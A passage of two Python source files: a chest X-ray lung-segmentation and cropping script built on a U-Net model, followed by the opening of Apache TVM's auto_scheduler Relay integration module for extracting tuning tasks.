region will be 256x256 in size. The result will be saved in a new directory.
"""
def load_CXR_from_list(filelist, im_shape):
"""
This function reads in images of jpg or png or jpeg format from a directory,
nomalize the images and store them in an array.
The images should have same length size and width size.
Parameters:
filelist (list): A list contains all file names in a directory.
im_shape (int): the size of images in the resulting array(img_shape, img_shape).
Returns:
X (list): a list of resized and normalized images.
resized_raw (list): a list of resized images.
raw_images (list):
"""
X = np.zeros((len(filelist), im_shape[0], im_shape[1], 1))
resized_raw = np.zeros((len(filelist), im_shape[0], im_shape[1]))
raw_images = []
for k, file in enumerate(filelist):
if file.suffix.lower() in ['.jpg', '.png', '.jpeg'] :
print('loading ' + file.name)
img = img_as_float(io.imread(file, as_gray = True))
raw_images.append(img)
img = transform.resize(img, im_shape)
resized_raw[k, ...] = img
img = exposure.equalize_hist(img)
img = np.expand_dims(img, -1)
X[k, ...] = img
# X = np.array(X)
# resized_raw = np.array(resized_raw)
X -= X.mean()
X /= X.std()
print ('### Dataset loaded')
print ('X shape ={} \t raw_resized shape = {}'.format(X.shape, resized_raw.shape))
print ('\tX:{:.1f}-{:.1f}\n'.format(X.min(), X.max()))
print ('\tX.mean = {}, X.std = {}'.format(X.mean(), X.std()))
return X, resized_raw, raw_images
def masked(img, mask, alpha=1):
"""
This function outlines lung field with red and predicted lung field with blue.
Parameters:
img (array): the original x-ray image.
mask (array): a predicted mask for the lung field.
alpha (float): variable used to change the color of the predicted lung field.
Returns:
img_masked (array): the lung field and predicted lung field mask.
"""
rows, cols = img.shape
color_mask = np.zeros((rows, cols, 3))
color_mask[..., 2] = mask / 255
img_color = np.dstack((img, img, img))
img_hsv = color.rgb2hsv(img_color)
color_mask_hsv = color.rgb2hsv(color_mask)
img_hsv[..., 0] = color_mask_hsv[..., 0]
img_hsv[..., 1] = color_mask_hsv[..., 1] * alpha
img_masked = color.hsv2rgb(img_hsv)
return img_masked
def draw_spine(img, spine_pos):
"""
This function highlights the spine position on the original image.
Parameters:
img (array): the original x-ray image.
spine_pos (array):
Returns:
img_color (array): superimpose the spine_pos and the original image.
"""
if len(img.shape) == 2:
img_color = np.dstack((img, img, img))
elif len(img.shape) == 3 and img.shape[2] == 1:
squeezed = np.squeeze(img)
img_color = np.dstack((squeezed, squeezed, squeezed))
elif len(img.shape) == 3 and img.shape[2] == 3:
img_color = np.copy(img)
else:
raise ValueError('Bad dimension of img :' + str(img.shape))
cv2.rectangle(img_color, (spine_pos, 0), (spine_pos, img.shape[0]), color = (0.8, 0 , 0), thickness = int(round(max(img.shape) * 0.02)))
return img_color
def draw_bbox(img, bbox):
"""
This function draws bounding box of lung field.
Parameters:
img (array): the original x-ray image.
bbox (array): the bounding box of lung field in the form of left most coordinate,
top most coordinate, right most coordinate and bottom most coordinate.
Returns:
img_color (array): the superimposed image of the original image and the
bounding box.
"""
if len(img.shape) == 2:
img_color = np.dstack((img, img, img))
elif len(img.shape) == 3 and img.shape[2] == 1:
squeezed = np.squeeze(img)
img_color = np.dstack((squeezed, squeezed, squeezed))
elif len(img.shape) == 3 and img.shape[2] == 3:
img_color = np.copy(img)
else:
raise ValueError('Bad dimension of img :' + str(img.shape))
if not (bbox is None):
left, top, right, bottom = bbox
cv2.rectangle(img_color, (left, top), (right, bottom), color = (0, 0.8, 0), thickness = int(round(max(img.shape) * 0.01)))
return img_color
def join_path_from_list(cur_path, path_list):
"""
This function adds a series of directory to a given path.
Parameters:
cur_path (path object): the path to be extended.
path_list (list): a list of directory to add to cur_path.
Returns:
cur_path (path object): the extended path.
"""
for folder in path_list:
cur_path = cur_path.joinpath(folder)
return cur_path
def change_first_folder(data_path, attached_str):
"""
This function changes the first directory specified in a given path.
Parameters:
data_path (path object): the path to be alternated.
attached_str (string): the replacement of the first directory in data_path.
Returns:
to_return (path object): the altered path.
"""
to_return = data_path.copy()
to_return[0] = to_return[0] + attached_str
return to_return
def select_spine(img):
"""
This function finds the location of spine of an x-ray image.
Parameters:
img (array): the original x-ray image.
Returns:
max_r2 (int): location of the spine.
"""
sumpix0 = np.sum(img, axis = 0)
max_r2 = np.int_(len(sumpix0) / 3) + np.argmax(sumpix0[ np.int_(len(sumpix0) / 3): np.int_(len(sumpix0)* 2 / 3)])
return max_r2
def mirror(spine_pos, pos):
"""
This function .
Parameters:
spine_pos (int): the position of the spine.
pos (int): the position of the middle of the image.
Returns:
spine_pos + (spine_pos - pos) or spine_pos - (pos - spine_pos) (int): mirror
the spine position to left or right of the center of the image.
"""
if pos < spine_pos:
return spine_pos + (spine_pos - pos)
else:
return spine_pos - (pos - spine_pos)
def left_right(label_map, label, spine_pos):
"""
This function .
Parameters:
label_map (array): the label matrix produced from cv2.connectedComponentsWithStats.
label (int): the label value to be compared with.
spine_pos (int): the location of the spine.
Returns:
'left'\'right'\'mid': the labeled segment with a larger area.
"""
left_chunk_size = np.sum(label_map[:, 0 : spine_pos] == label)
right_chunk_size = np.sum(label_map[:, spine_pos + 1 :] == label)
if left_chunk_size > right_chunk_size:
return 'left'
elif left_chunk_size < right_chunk_size:
return 'right'
else:
return 'mid'
def select_lung(pred, resized_raw, cut_thresh, debug, filename,out_pad_size, k_size = 5):
"""
This function detects the lung region and denoise the image.
Parameters:
pred (array): the predicted lung mask produced by the pretrained U-Net.
resied_raw (array): the original image resize.
cut_thresh (float): the area threshold to keep a segment as a part of the
lung region.
debug (boolean): print extra information about the connected components
for debugging purpose.
filename (string): the file name of the original image.
out_pad_size (int): the number of pixels padded ourside of the bounding
box.
k_size (int): the size of the opencv morphological kernel.
Returns:
denoised (array): a binary mask generated from the connected areas.
bbox (array): the coordinates of the lung region bounding box.
spine_pos (int): the position of the spine.
"""
opened = cv2.morphologyEx(pred, cv2.MORPH_OPEN, kernel = np.ones((k_size, k_size)))
cnt, label_map, stats, centriods = cv2.connectedComponentsWithStats(opened)
# index sorted by area, from large to small, first one is the background
idx_sorted = np.argsort(stats[:, cv2.CC_STAT_AREA])[::-1]
stats = stats[idx_sorted]
# remove small connected region
if debug:
print(stats)
stats = stats[stats[:, cv2.CC_STAT_AREA] > cut_thresh * np.prod(pred.shape)]
denoised = np.zeros(opened.shape, dtype = np.uint8)
for i in range(1, min(stats.shape[0], 3)):
denoised[label_map == idx_sorted[i]] = 255
spine_pos = select_spine(resized_raw)
if stats.shape[0] < 3:
if stats.shape[0] == 1:
print(filename + ' No large enough area Detected!!!')
return denoised, None, spine_pos
else:
print(filename + ' Single Lung Detected !!!')
top = stats[1, cv2.CC_STAT_TOP]
bottom = stats[1, cv2.CC_STAT_TOP] + stats[1, cv2.CC_STAT_HEIGHT]
left = stats[1, cv2.CC_STAT_LEFT]
right = stats[1, cv2.CC_STAT_LEFT] + stats[1, cv2.CC_STAT_WIDTH]
left_mirror = mirror(spine_pos, left)
right_mirror = mirror(spine_pos, right)
left = min(left, right_mirror)
right = max(right, left_mirror)
else:
left = min(stats[1, cv2.CC_STAT_LEFT], stats[2, cv2.CC_STAT_LEFT])
top = min(stats[1, cv2.CC_STAT_TOP], stats[2, cv2.CC_STAT_TOP])
right = max(
stats[1, cv2.CC_STAT_LEFT] + stats[1, cv2.CC_STAT_WIDTH],
stats[2, cv2.CC_STAT_LEFT] + stats[2, cv2.CC_STAT_WIDTH]
)
bottom = max(
stats[1, cv2.CC_STAT_TOP] + stats[1, cv2.CC_STAT_HEIGHT],
stats[2, cv2.CC_STAT_TOP] + stats[2, cv2.CC_STAT_HEIGHT]
)
chunk1_side = left_right(label_map, 1, spine_pos)
chunk2_side = left_right(label_map, 2, spine_pos)
# print('chunk1 on' + chunk1_side + ' chunk2 on ' + chunk2_side)
if chunk1_side == chunk2_side:
print(filename + ' two chunks on the same side!!!')
left_mirror = mirror(spine_pos, left)
right_mirror = mirror(spine_pos, right)
left = min(left, right_mirror)
right = max(right, left_mirror)
bbox = np.array([left, top, right, bottom])
bbox = out_pad(bbox, denoised.shape, out_pad_size)
# boxed = cv2.rectangle(denoised, (bbox[0], bbox[1]), (bbox[2], bbox[3]), color = 255, thickness=3)
# return denoised, bbox, denoised_no_bbox, raw_bbox
return denoised, bbox, spine_pos
def out_pad(bbox_in, shape, out_pad_size):
"""
This function adds padding outside of the bounding box.
Parameters:
bbox_in (array): the array that contains the coordinates of the bounding
box for the lung region.
shape (array): the length of the bounding box. The boudning box needs to
be square shaped.
out_pad_size (int): the number of pixels to be padded outside of the bounding
box.
Returns:
bbox_padded (array): the array that contains the coordinates of the padded
bounding box.
"""
left, top, right, bottom = bbox_in
left = max(0, left - out_pad_size)
# right = min(shape[1] - 1, right + out_pad_size)
right = min(shape[1] , right + out_pad_size)
top = max(0, top - out_pad_size)
# bottom = min(shape[0] - 1, bottom + out_pad_size)
bottom = min(shape[0], bottom + out_pad_size)
bbox_padded = np.array([left, top, right, bottom])
return bbox_padded
def square_helper(start, finish, expand1, expand2, size_limit):
"""
This function can expand one axis of the size of the bounding box.
Parameters:
start (int): the coordinate of the start point.
finish (int): the coordinate of the finish point.
expand1 (int): the number of pixels used to expand the starting point.
expand2 (int): the number of pixels used to expand the finishing point.
size_limit (int): the maximum length of this expansion.
Returns:
new_start (int): the coordinate of the expanded start point.
new_finish (int): the coordinate of the expanded finish point.
"""
new_start = max(0, start - expand1)
expand1_rem = expand1 - (start - new_start)
new_finish = min(size_limit , finish + expand2)
expand2_rem = expand2 - (new_finish - finish)
# print('expand1_rem = ', expand1_rem, ' expand2_rem = ', expand2_rem)
if expand1_rem > 0 and expand2_rem == 0:
new_finish = min(size_limit, new_finish + expand1_rem)
elif expand1_rem == 0 and expand2_rem > 0:
new_start = max(0, new_start - expand2_rem)
return new_start, new_finish
def square_bbox(img_shape, raw_bbox):
"""
This function change the shape of a bounding box to square.
Parameters:
img_shape (array): the shape of the original image.
raw_bbox (array): the bounding box to be shaped into square.
Returns:
squared_bbox (array): the square bounding box generated from the raw bounding
box.
"""
if raw_bbox is None:
return None
# img_shape = denoised_no_bbox.shape
left, top, right, bottom = raw_bbox
width = right - left
height = bottom - top
center = [round((left + right) / 2), round((top + bottom) / 2)]
diff = abs(width - height)
expand1 = diff // 2
expand2 = diff - expand1
sqaured_bbox = np.copy(raw_bbox)
# print('expand1 = ', expand1, ' expand2 = ', expand2)
if width > height:
new_top, new_bottom = square_helper(top, bottom, expand1, expand2, img_shape[0])
sqaured_bbox = np.array([left, new_top, right, new_bottom])
elif width < height:
new_left, new_right = square_helper(left, right, expand1, expand2, img_shape[1])
sqaured_bbox = np.array([new_left, top, new_right, bottom])
# print('original bounding box:' + str(raw_bbox))
# print('squared bounding box:' + str(sqaured_bbox))
return sqaured_bbox
def bbox_mask_and_crop(raw_img, bbox):
"""
This function crops the original image using the bounding box.
Parameters:
raw_img (array): the original uncropped image.
bbox (array): the bounding box array which contains the coordinates
of the four corners of the box. The bounding box can be shapes other than
square.
Returns:
cropped_img (array): the image cropped out from the original image using
the bounding box.
bbox (array): the square bounding box array which contains the coordinates
of the four corners of the box.
"""
if bbox is None:
return raw_img, bbox
left, top, right, bottom = bbox
cropped_img = raw_img[
top : bottom,
left : right
]
return cropped_img, bbox
def square_crop(raw_img, raw_bbox):
"""
This function crops the original image using a square bounding box generated
from the provided raw bounding box.
Parameters:
raw_img (array): the original uncropped image.
raw_bbox (array): the bounding box which might not be square shaped.
Returns:
bbox_mask_and_crop(raw_img, sqaured_bbox): see the bbox_mask_and_crop function for
more information.
"""
if raw_bbox is None:
return raw_img, raw_bbox
sqaured_bbox = square_bbox(raw_img.shape, raw_bbox)
return bbox_mask_and_crop(raw_img, sqaured_bbox)
def crop_lung(raw_img, cur_shape, bbox):
"""
This function crops out the lung region from the original image using a bounding
box which might not be square shaped.
Parameters:
raw_img (array): the original uncropped image.
cur_shape (array): the desired shape of the image.
bbox (array): the bounding box to the lung region which might not be square
shaped
Returns:
bbox_mask_and_crop(raw_img, raw_bbox): see the bbox_mask_and_crop function for
more information.
"""
if bbox is None:
return raw_img, None
if len(bbox) != 4:
raise ValueError('WRONG length of bounding box')
left, top, right, bottom = bbox
raw_height = raw_img.shape[0]
raw_width = raw_img.shape[1]
cur_height = cur_shape[0]
cur_width = cur_shape[1]
# print('Bounding box = {}'.format(bbox))
# print('raw shape = {}'.format(raw_img.shape))
# print('cur shape = {}'.format(cur_shape))
lung_top = int(round(top / cur_height * raw_height))
lung_bottom = int(round(bottom / cur_height * raw_height))
lung_left = int(round(left / cur_width * raw_width))
lung_right = int(round(right / cur_width * raw_width))
# print('lung left = {} right = {} top = {} bottom = {} '.format(lung_left, lung_right, lung_top, lung_bottom))
lung_img = raw_img[
lung_top : lung_bottom,
lung_left : lung_right
]
# print('lung shape = {}'.format(lung_img.shape))
raw_bbox = np.array([lung_left, lung_top, lung_right, lung_bottom])
return bbox_mask_and_crop(raw_img, raw_bbox)
def pretty(filename, char_per_line):
return '\n'.join(filename[i : i + char_per_line] for i in range(0, len(filename), char_per_line))
def single_img_crop(img, resized_raw_img, raw_img, file_path, UNet, result_folder,
im_shape = (256, 256), cut_thresh = 0.02, out_pad_size = 8, debug_folder = None , debugging = False):
'''
Crop out the lung area from CXR for single images\n
lung prediction based on UNet
Parameters
----------
img : np array
acceptable shape: (n, x, x, 1), (n, x, x), (x, x, 1), (x, x)
where n is the number of images; x is the input_shape, by default 256
resized_raw_img : np array
raw sized image, with shape of (x, x);
see load_CXR_from_list for details
raw_img : np array
original raw image;
see load_CXR_from_list for details
UNet: loaded UNet model from https://github.com/imlab-uiip/lung-segmentation-2d
path to UNet
result_folder : preferrebly pathlib object
path to output
im_shape : tuple
specify the input image shape of UNet, by default (256, 256)
cut_thresh: float
connected components less than cut_thresh * np.prod(im_shape) will be removed
out_pad_size: int
Default to be 8, how many pixels to enlarge the bounding box.
debug_folder : preferrebly pathlib object
path to debug images; if not specified, no debug images will be written to local
debugging: bool
Default to be false. If true, will plot debugging images to screen instead of saving to local.
Returns
----------
lung_img : np array
cropped lung area (not neccessarily squared)
lung_img_squared :
cropped lung area (squared if possible)
'''
# we need (n, x, x, 1) format for input of Unet
# n is the number of images
# x is the input shape, by default 256
if len(img.shape) == 4 and img.shape[1: -1] == im_shape and img.shape[-1] == 1:
# format (n, x, x, 1)
pass
elif len(img.shape) == 2 and img.shape == im_shape:
# format (x, x)
img = np.expand_dims(img, axis = (0, -1))
elif len(img.shape) == 3 and img.shape[:2] == im_shape and img.shape[-1] == 1:
# format (x, x, 1)
img = np.expand_dims(img, axis = 0)
elif len(img.shape) == 3 and img.shape[1:] == im_shape:
# format (n, x, x)
img = np.expand_dims(img, axis = -1)
else:
raise ValueError('Bad dimension of img :' + str(img.shape))
if not (debug_folder is None) or debugging:
fig, axes = plt.subplots(2, 2, figsize = (8, 8))
fig2, axes2 = plt.subplots(1, 3, figsize = (18, 6))
pred = np.squeeze(UNet.predict(img))
pr = (pred > 0.5).astype(np.uint8)
if not file_path == None:
filename = file_path.stem
suffix = file_path.suffix
print('outputting result for ' + filename)
denoised, raw_bbox, spine_pos = select_lung(pr, resized_raw_img, cut_thresh = cut_thresh, debug = debugging, filename = filename, out_pad_size = out_pad_size)
# denoised_sqaured, sqaured_bbox = square_bbox(denoised_no_bbox, raw_bbox)
lung_img, nonSquared_bbox = crop_lung(raw_img, im_shape, raw_bbox)
lung_img_squared, sqaured_bbox = square_crop(raw_img, nonSquared_bbox)
lung_img = util.img_as_ubyte(lung_img)
lung_img_squared = util.img_as_ubyte(lung_img_squared)
if not (debug_folder is None) or debugging:
axes[0, 0].set_title(pretty(filename, char_per_line = 20) + '\n'+ '_resized_raw')
axes[0, 0].imshow(resized_raw_img, cmap='gray')
axes[0, 0].set_axis_off()
axes[1, 0].set_title(pretty(filename, char_per_line = 20) + '\n'+ '_rawpred')
axes[1, 0].imshow(pr ,cmap='gray')
axes[1, 0].set_axis_off()
axes[0, 1].set_title(pretty(filename, char_per_line = 20) + '\n'+ '_denoised_pred')
axes[0, 1].imshow(denoised, cmap='gray')
axes[0, 1].set_axis_off()
axes[1, 1].set_title(pretty(filename, char_per_line = 20) + '\n'+ '_denoised_masked')
area_masked = masked(resized_raw_img, denoised, alpha = 0.6)
bbox_drawn = draw_bbox(area_masked, raw_bbox)
spine_drawn = draw_spine(bbox_drawn, spine_pos)
axes[1, 1].imshow(spine_drawn)
axes[1, 1].set_axis_off()
fig.tight_layout()
axes2[0].set_title(pretty(filename, char_per_line = 30) + '\n'+ 'raw_img')
axes2[0].imshow(raw_img, cmap='gray')
# axes2[0].set_axis_off()
axes2[1].set_title(pretty(filename, char_per_line = 30) + '\n'+ 'unsquared_boudning_box' + '\n' + str(nonSquared_bbox))
axes2[1].imshow(draw_bbox(raw_img, nonSquared_bbox))
# axes2[1].set_axis_off()
axes2[2].set_title(pretty(filename, char_per_line = 30) + '\n'+ 'squared_boudning_box'+ '\n' + str(sqaured_bbox))
axes2[2].imshow(draw_bbox(raw_img, sqaured_bbox))
fig.tight_layout()
if debugging:
plt.show()
elif not (debug_folder is None):
out_path = debug_folder.joinpath(filename + '_debug_resized_scale' + suffix)
fig.savefig(str(out_path))
out_path = debug_folder.joinpath(filename + '_debug_rawscale' + suffix)
fig2.savefig(str(out_path))
if not debugging:
if not result_folder == None:
result_sub = result_folder.joinpath('crop')
result_sub.mkdir(parents=True, exist_ok=True)
out_path = result_sub.joinpath(filename + '_crop' + suffix)
io.imsave(str(out_path), lung_img )
result_sub = result_folder.joinpath('crop_squared')
result_sub.mkdir(parents=True, exist_ok=True)
out_path = result_sub.joinpath(filename + '_crop_squared' + suffix)
io.imsave(str(out_path), lung_img_squared )
if not (debug_folder is None) or debugging:
plt.close(fig)
plt.close(fig2)
return lung_img, lung_img_squared
def lungseg_fromdata(X, resized_raw, raw_images, file_paths, UNet, result_folder,
im_shape = (256, 256), cut_thresh = 0.02, out_pad_size = 8, debug_folder = None ,debugging = False):
'''
Crop out the lung area from CXR for a set of images.
lung prediction based on UNet
Parameters
----------
img : np array
acceptable shape: (n, x, x, 1), (n, x, x), (x, x, 1), (x, x)
where n is the number of images; x is the input_shape, by default 256
resized_raw_img : np array
raw sized image, with shape of (x, x);
see load_CXR_from_list for details
raw_img : np array
original raw image;
see load_CXR_from_list for details
UNet: loaded UNet model from https://github.com/imlab-uiip/lung-segmentation-2d
path to UNet
result_folder : preferrebly pathlib object
path to output
im_shape : tuple
specify the input image shape of UNet, by default (256, 256)
cut_thresh: float
connected components less than cut_thresh * np.prod(im_shape) will be removed
out_pad_size: int
Default to be 8, how many pixels to enlarge the bounding box.
debug_folder : preferrebly pathlib object
path to debug images; if not specified, no debug images will be written to local
debugging: bool
Default to be false. If true, will plot debugging images to screen instead of saving to local.
'''
# tf.debugging.set_log_device_placement(True)
# print("Num GPUs Available: ", len(tf.config.experimental.list_physical_devices('GPU')))
# with tf.device('/GPU:0'):
n_test = X.shape[0]
inp_shape = X[0].shape
UNet = load_model(UNet, compile=False)
print('n_test = {}'.format(n_test))
# For inference standard keras ImageGenerator can be used.
test_gen = ImageDataGenerator(rescale=1.)
i = 0
for xx in test_gen.flow(X, batch_size=1, shuffle=False):
single_img_crop(
img = xx,
resized_raw_img = resized_raw[i],
raw_img = raw_images[i],
file_path = file_paths[i],
UNet = UNet,
result_folder = result_folder,
im_shape = im_shape,
cut_thresh = cut_thresh,
out_pad_size = out_pad_size,
debug_folder = debug_folder,
debugging = debugging
)
i += 1
if i == n_test:
break
print('Thread done')
def gen_idx(length, k_fold):
idxs = np.array([length // k_fold] * k_fold)
idxs[:length % k_fold] = idxs[:length % k_fold] + 1
start_points = np.cumsum(idxs)
start_points = [0] + list(start_points)
return start_points
def adjust_process_num(length):
if length < 20:
k_fold = 1
elif length < 100:
k_fold = 4
elif length < 400:
k_fold = 8
elif length < 1000:
k_fold = 16
else:
k_fold = 24
return k_fold
def lungseg_one_process(result_folder, UNet, filenames,
im_shape = (256, 256), debug_folder = None, cut_thresh = 0.02, out_pad_size = 8, debug = False):
X, resized_raw, raw_images = load_CXR_from_list(filenames, im_shape)
print('X shape = ', X.shape)
lungseg_fromdata(X, resized_raw, raw_images, filenames, UNet, result_folder,
im_shape = im_shape, cut_thresh = cut_thresh, out_pad_size = out_pad_size, debug_folder = debug_folder, debugging = debug)
def singlefolder_lungseg(data_path, result_folder, UNet, debug_folder = None, k_fold = None, cut_thresh = 0.02, out_pad_size = 8, debug = False, filenames = None):
'''
Crop out the lung area from CXR\n
lung prediction based on UNet: https://github.com/imlab-uiip/lung-segmentation-2d
Parameters
----------
data_path : preferrebly pathlib object
all images in that path will be loaded for lung segmentation if filenames not specified.
result_folder : preferrebly pathlib object
path to output
UNet: preferrebly pathlib object
path to UNet
debug_folder : preferrebly pathlib object
path to debug images; if not specified, no debug images will be written to local
k_fold: int
Specify how many processes to create to finish this task.
If None, processes are created based on adjust_process_num function
cut_thresh: float
connected components less than cut_thresh * np.prod(im_shape) will be removed
out_pad_size: int
Default to be 8, how many pixels to enlarge the bounding box.
debug: bool
Default to be false. If true, will plot debugging images to screen instead of saving to local.
filenames: list
If specified, load these images instead of loading all images in data_path.
Absolute paths needed.
'''
data_path = pathlib.Path(data_path)
result_folder = pathlib.Path(result_folder)
result_folder.mkdir(parents=True, exist_ok=True)
if not debug_folder is None:
debug_folder = pathlib.Path(debug_folder)
debug_folder.mkdir(parents=True, exist_ok=True)
im_shape = (256, 256)
chunknum = 0
chunksize = 500
print('processing data in ' + str(data_path))
if filenames is None:
filenames = list(data_path.glob('*'))
totalfiles = len(filenames)
while chunknum * chunksize < totalfiles:
start = chunknum * chunksize
end = min(totalfiles, (chunknum + 1) * chunksize)
print('segmenting {} files of folder {}'.format((start, end), str(data_path)))
curfiles = filenames[start : end]
if debug:
lungseg_one_process(result_folder, UNet, curfiles,
im_shape = im_shape, debug_folder = debug_folder, cut_thresh = cut_thresh, out_pad_size = out_pad_size, debug = debug)
return
start_time = time.time()
keywords = {
'im_shape' : im_shape,
'cut_thresh' : cut_thresh,
'out_pad_size' : out_pad_size,
'debug_folder' : debug_folder,
'debug' : debug
}
if k_fold is None:
k_fold = adjust_process_num(len(curfiles))
print('Running using {} process'.format(k_fold))
start_idxs = gen_idx(len(curfiles), k_fold)
pool = []
for k in range(k_fold):
# attention here the slicing is wrong!!
# we missed the last a few images
arg_str = (
result_folder,
UNet,
curfiles[start_idxs[k]: start_idxs[k + 1]]
)
p = multiprocessing.Process(target = lungseg_one_process, args = arg_str, kwargs = keywords)
p.start()
pool.append(p)
for p in pool:
p.join()
print('{} processes takes {} seconds'.format(k_fold, time.time() - start_time))
chunknum = chunknum + 1
def genlist(data_path_list, list_dict):
cur_dict = list_dict
for i in range(len(data_path_list)):
if i > 0:
cur_dict = cur_dict[data_path_list[i]]
# print(cur_dict)
if type(cur_dict) == list:
return cur_dict
if __name__ == '__main__':
"""
This is the main function of the script. A set of chest x-rays can be cropped
here.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--folder', type=str, help = 'the directory of the image folder')
parser.add_argument('-U', '--Unet', type = str, help = 'the directory of the saved Unet weights')
parser.add_argument('-o', '--output', type = str, help = 'the directory of the resized image')
args = parser.parse_args()
UNet_path = args.Unet
folder_path = os.path.normpath(args.folder)
output_path = os.path.normpath(args.output)
if not os.path.isdir(folder_path):
containing_folder = os.path.dirname(folder_path)
singlefolder_lungseg(containing_folder, output_path, UNet_path, out_pad_size=8, debug=False, filenames=[pathlib.Path(folder_path)])
else:
singlefolder_lungseg(folder_path, output_path, UNet_path, out_pad_size=8, debug=False)
print('Completed!')
# # single image lung segmentation
# from keras.models import load_model
# parent_path = pathlib.Path(__file__).absolute().parent
# data_path = parent_path.parent.joinpath('NMHFiles_sample', 'Negative')
# img_path = data_path.joinpath('8356_47cfe01e37c2237dd6a31b424473c89f_AP_2.png')
# UNet = load_model(UNet_path)
# im_shape = (256, 256)
# X, resized_raw, raw_images = load_CXR_from_list([img_path], im_shape)
# result_folder = parent_path.parent.joinpath('NMHFiles_sample_crop', 'Negative')
# single_img_crop(X[0], resized_raw[0], raw_images[0], img_path, UNet, result_folder, debugging = True)
# print('Total time = {}'.format(time.time() - start))
|
relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name
"""
Integrate auto_scheduler into relay. It implements the following items:
1. Extract search tasks from a relay program
2. Provide auto-scheduling for all TOPI compute functions
"""
import json
import logging
import threading
import tvm
from tvm import autotvm, transform
from tvm.ir.transform import PassContext
from tvm.runtime import convert_to_object
from tvm.target import Target
from tvm.te.tensor import ComputeOp, PlaceholderOp, Tensor
from tvm.tir import Reduce
from tvm.tir import expr as _expr
from . import _ffi_api
from .compute_dag import ComputeDAG, LayoutRewriteOption
from .dispatcher import DispatchContext
from .search_task import SearchTask
from .utils import get_const_tuple
from .workload_registry import register_workload_tensors
logger = logging.getLogger("auto_scheduler")
def call_all_topi_funcs(mod, params, target, opt_level=3):
"""Call all TOPI compute to extract auto_scheduler tasks in a Relay program"""
# pylint: disable=import-outside-toplevel
from tvm import relay
# Turn off AutoTVM config not found warnings
old_autotvm_silent = autotvm.GLOBAL_SCOPE.silent
autotvm.GLOBAL_SCOPE.silent = True
with transform.PassContext(
opt_level=opt_level,
config={
"relay.backend.use_auto_scheduler": True,
"relay.backend.disable_compile_engine_cache": True,
},
disabled_pass={"AutoSchedulerLayoutRewrite"},
):
compiler = relay.vm.VMCompiler()
if params:
compiler.set_params(params)
mod = tvm.IRModule.from_expr(mod) if isinstance(mod, relay.Function) else mod
compiler.lower(mod, target)
autotvm.GLOBAL_SCOPE.silent = old_autotvm_silent
def extract_tasks(
mod,
params,
target,
target_host=None,
hardware_params=None,
include_simple_tasks=False,
dump_workload_to_dag_log=None,
opt_level=3,
):
"""Extract tuning tasks from a relay program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: Union[tvm.target.Target, str]
The compilation target
target_host: Optional[Union[tvm.target.Target, str]]
The host compilation target
hardware_params : Optional[HardwareParams]
Hardware parameters used for the search tasks
include_simple_tasks: bool
Whether to extract simple tasks that do not include complicated ops.
dump_workload_to_dag_log: Optional[str]
A file to dump an association between the workload keys and the actual DAG
opt_level : Optional[int]
The optimization level of the task extractions.
Returns
-------
tasks: List[SearchTask]
The tasks in this network
weights: List[int]
The weight (i.e. the number of appearance) of extracted tasks
"""
# pylint: disable=import-outside-toplevel
target, target_host = Target.check_and_update_host_consist(target, target_host)
# Run the compiler to collect all TOPI calls during compilation.
env = TracingEnvironment(
TracingMode.EXTRACT_TASK if include_simple_tasks else TracingMode.EXTRACT_COMPLEX_TASK_ONLY
)
dispatch_ctx = DispatchContext.current
old_verbose = dispatch_ctx.verbose
dispatch_ctx.verbose = 0
with env:
# Wrap build call in a new thread to avoid the conflict
# between python's multiprocessing and tvm's thread pool
build_thread = threading.Thread(
target=call_all_topi_funcs, args=(mod, params, target, opt_level)
)
build_thread.start()
build_thread.join()
dispatch_ctx.verbose = old_verbose
# create search tasks
tasks = []
weights = []
for wkl_key, (weight, func_names) in env.wkl_key_to_weight.items():
tasks.append(
SearchTask(
workload_key=wkl_key,
target=target,
hardware_params=hardware_params,
# When auto scheduler is used in end to end network, try to apply layout rewrite
# to improve the overall performance
layout_rewrite_option=LayoutRewriteOption.get_target_default(target, True),
task_inputs=(
env.wkl_key_to_input_names[wkl_key]
if wkl_key in env.wkl_key_to_input_names
else None
),
task_inputs_save_to_file=True,
desc=",".join(func_names),
)
)
weights.append(int(weight))
if dump_workload_to_dag_log is not None:
with open(dump_workload_to_dag_log, "w") as f:
json.dump({task.workload_key: str(task.compute_dag) for task in tasks}, f)
return tasks, weights
class TracingMode:
"""Two modes for tracing"""
EXTRACT_TASK = 0 # trace all topi calls to extract tasks
EXTRACT_COMPLEX_TASK_ONLY = 1 # same as EXTRACT_TASK but ignore the task without complex ops
PREPARE_LAYOUT_REWRITE = 2 # trace topi calls to prepare layout rewrite
class TracingEnvironment:
"""Global environment for tracing all topi function calls"""
current = None
def __init__(self, tracing_mode):
self.tracing_mode = tracing_mode
self.relay_disable_build_cache = "false"
self.func_name_to_wkl_key = {}
self.wkl_key_to_weight = {}
self.wkl_key_to_input_names = {}
def __enter__(self):
TracingEnvironment.current = self
return self
def __exit__(self, exc_type, exc_val, exc_tb):
TracingEnvironment.current = None
def add_workload_key(self, func_name, workload_key):
"""Add the workload key of a search task.
Parameters
----------
func_name: str
The function name of the task.
workload_key: str
The workload key of a task.
"""
self.func_name_to_wkl_key[func_name] = workload_key
if workload_key not in self.wkl_key_to_weight:
self.wkl_key_to_weight[workload_key] = (0, set())
weight, func_names = self.wkl_key_to_weight[workload_key]
func_names.add(func_name)
self.wkl_key_to_weight[workload_key] = (weight + 1, func_names)
def add_workload_input_names(self, workload_key, input_names):
"""Add special task inputs to this workload.
Parameters
----------
workload_key : str
The workload key of a task.
input_names : List[str]
A list of input names.
"""
self.wkl_key_to_input_names[workload_key] = input_names
@tvm._ffi.register_func("auto_scheduler.enter_layout_rewrite")
def enter_layout_rewrite():
"""Enter layout rewrite tracing environment"""
env = TracingEnvironment(TracingMode.PREPARE_LAYOUT_REWRITE)
env.__enter__()
@tvm._ffi.register_func("auto_scheduler.exit_layout_rewrite")
def exit_layout_rewrite():
"""Exit layout rewrite tracing environment"""
